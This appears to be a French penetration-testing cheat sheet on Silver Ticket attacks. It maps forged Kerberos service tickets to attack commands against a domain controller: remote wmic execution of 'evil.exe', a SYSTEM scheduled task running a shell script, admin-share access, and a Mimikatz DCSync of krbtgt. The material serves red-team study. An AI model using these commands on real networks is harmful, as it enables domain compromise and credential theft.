# Silver Ticket

### Service à cibler lors de demande de TGS : 

<table><thead><tr><th width="160.33333333333331" align="center">Type de service</th><th align="center">Service Silver Ticket</th><th>Attaques</th></tr></thead><tbody><tr><td align="center">SWMI</td><td align="center">HOST + RPCSS</td><td><code>wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"</code></td></tr><tr><td align="center">Powershell Remoting</td><td align="center">HTTP + WSMAN</td><td><code>New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC</code></td></tr><tr><td align="center">WinRM</td><td align="center">HTTP + WSMAN</td><td><code>New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC</code></td></tr><tr><td align="center">Scheduled Tasks</td><td align="center">HOST</td><td><code>schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"</code></td></tr><tr><td align="center">Windows File Share (CIFS)</td><td align="center">CIFS</td><td><code>dir \dc01\c$</code></td></tr><tr><td align="center">LDAP operations including Mimikatz DCSync</td><td align="center">LDAP</td><td><code>lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt</code></td></tr><tr><td align="center">Windows Remote Server Administration Tools</td><td align="center">RPCSS + LDAP + CIFS</td><td></td></tr></tbody></table>